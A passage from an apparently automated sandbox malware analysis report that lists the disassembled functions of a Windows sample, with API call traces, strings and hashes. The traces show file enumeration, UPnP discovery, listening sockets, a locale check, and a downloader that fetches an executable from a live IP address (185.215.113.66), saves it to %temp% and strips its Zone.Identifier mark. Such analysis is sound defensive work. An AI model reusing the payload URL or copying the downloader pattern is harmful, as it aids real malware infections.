                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,00411368), ref: 00406801
                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040683A
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040685A
                                                                                                                                                                                                      • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
                                                                                                                                                                                                      • FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
                                                                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 004068BF
                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 004068C9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                                                                                      • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                      • API String ID: 92872011-445461498
                                                                                                                                                                                                      • Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                                                                                      • Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98
                                                                                                                                                                                                      Function 0040E190 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 117networkstringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                                                                                      • htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                                                                                      • inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                                                                                      • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                                                                                        • Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                                                                                        • Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                                                                                        • Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                                                                                        • Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                                                                                      • bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                                                                                      • lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                                                                                      • sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                                                                                      • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                                                                                        • Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                                                                                        • Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                                                                                        • Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                                                                                        • Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                                                                                        • Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                                      • String ID: 239.255.255.250$X#A
                                                                                                                                                                                                      • API String ID: 726339449-2206458040
                                                                                                                                                                                                      • Opcode ID: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
                                                                                                                                                                                                      • Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                                                                                                                                                                                      Function 00402020 Relevance: 16.6, APIs: 11, Instructions: 131networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                                                                                                      • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                                                                                                        • Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE
                                                                                                                                                                                                      • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                                                                                                      • setsockopt.WS2_32 ref: 004020D1
                                                                                                                                                                                                      • htons.WS2_32(?), ref: 00402101
                                                                                                                                                                                                      • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                                                                                                      • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                                                                                                      • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                                                                                                      • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                                                                                        • Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1603358586-0
                                                                                                                                                                                                      • Opcode ID: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
                                                                                                                                                                                                      • Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A
                                                                                                                                                                                                      Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                                                                                                      • htons.WS2_32(?), ref: 00401508
                                                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                                                                                                      • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                                                                                                        • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                                                                                        • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                                                                                        • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4174406920-0
                                                                                                                                                                                                      • Opcode ID: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
                                                                                                                                                                                                      • Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A
                                                                                                                                                                                                      Function 0040D770 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D782
                                                                                                                                                                                                      • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
                                                                                                                                                                                                      • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D7F4
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 0040D814
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040D81A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 107502007-0
                                                                                                                                                                                                      • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                                      • Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99
                                                                                                                                                                                                      Function 0040B430 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                                                                                        • Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
                                                                                                                                                                                                        • Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D
                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                                                                                      • connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                                                                                      • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • www.update.microsoft.com, xrefs: 0040B467
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                                                                                      • String ID: www.update.microsoft.com
                                                                                                                                                                                                      • API String ID: 4063137541-1705189816
                                                                                                                                                                                                      • Opcode ID: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
                                                                                                                                                                                                      • Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA
                                                                                                                                                                                                      Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
                                                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                                                                                      • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                                                                                        • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                                                                                        • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                                                                                        • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401459
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3943618503-0
                                                                                                                                                                                                      • Opcode ID: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
                                                                                                                                                                                                      • Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A
                                                                                                                                                                                                      Function 0040F1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
                                                                                                                                                                                                      • strcmp.NTDLL ref: 0040F1D2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InfoLocalestrcmp
                                                                                                                                                                                                      • String ID: UKR
                                                                                                                                                                                                      • API String ID: 3191669094-64918367
                                                                                                                                                                                                      • Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                                                                                      • Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA
                                                                                                                                                                                                      Function 0040F560 Relevance: 75.5, APIs: 36, Strings: 7, Instructions: 231filesleepnetworkCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040F569
                                                                                                                                                                                                      • srand.MSVCRT ref: 0040F570
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
                                                                                                                                                                                                      • strlen.NTDLL ref: 0040F59A
                                                                                                                                                                                                      • mbstowcs.NTDLL ref: 0040F5B1
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F5B9
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F5CD
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040F5F4
                                                                                                                                                                                                      • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040F6F4
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0040F704
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F70F
                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 0040F730
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040F758
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0040F76E
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F77B
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F788
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F795
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F7A0
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F7B5
                                                                                                                                                                                                      • Sleep.KERNEL32 ref: 0040F7C6
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F7CC
                                                                                                                                                                                                      • rand.MSVCRT ref: 0040F7E0
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040F807
                                                                                                                                                                                                      • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040F844
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0040F854
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F85F
                                                                                                                                                                                                      • Sleep.KERNEL32(000007D0), ref: 0040F880
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040F8A7
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 0040F8B6
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                                                                                                      • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$.Wu
                                                                                                                                                                                                      • API String ID: 1632876846-3869032167
                                                                                                                                                                                                      • Opcode ID: 96f0a69f3da845a58fc131bbffdea3f28c32c868df6781a1e5befd7d1371e6b2
                                                                                                                                                                                                      • Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96f0a69f3da845a58fc131bbffdea3f28c32c868df6781a1e5befd7d1371e6b2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69
                                                                                                                                                                                                      Function 004064A0 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 111networkfileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004064A9
                                                                                                                                                                                                      • srand.MSVCRT ref: 004064B0
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
                                                                                                                                                                                                      • rand.MSVCRT ref: 004064D6
                                                                                                                                                                                                      • rand.MSVCRT ref: 004064EA
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0040650F
                                                                                                                                                                                                      • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
                                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 004065F2
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00406609
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00406619
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040662D
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040663A
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00406647
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %temp%, xrefs: 004064CB
                                                                                                                                                                                                      • http://185.215.113.66/tdrp.exe, xrefs: 00406546
                                                                                                                                                                                                      • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
                                                                                                                                                                                                      • %s\%d%d.exe, xrefs: 00406505
                                                                                                                                                                                                      • .Wu, xrefs: 004065F2, 0040662D
                                                                                                                                                                                                      • %s:Zone.Identifier, xrefs: 004065FD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
